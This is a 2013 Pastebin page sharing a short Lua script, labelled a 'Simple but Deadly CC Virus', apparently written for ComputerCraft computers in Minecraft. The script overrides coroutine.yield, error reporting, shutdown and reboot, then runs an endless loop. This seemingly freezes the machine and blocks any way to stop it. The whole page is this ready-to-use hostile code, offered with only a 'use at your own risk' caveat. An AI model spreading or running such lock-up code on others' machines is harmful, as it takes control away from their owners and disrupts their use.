MudkipTheEpic

Simple but Deadly CC Virus... Use at your own risk

Feb 10th, 2013
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.19 KB | None | 0 0
  1. coroutine.yield=function()
  2. return nil
  3. end
  4. printError=coroutine.yield
  5. error=coroutine.yield
  6. os.shutdown=coroutine.yield
  7. os.reboot=coroutine.yield
  8. while true do
  9. pcall(coroutine.yield)
  10. end
Advertisement
Add Comment
Please, Sign In to add comment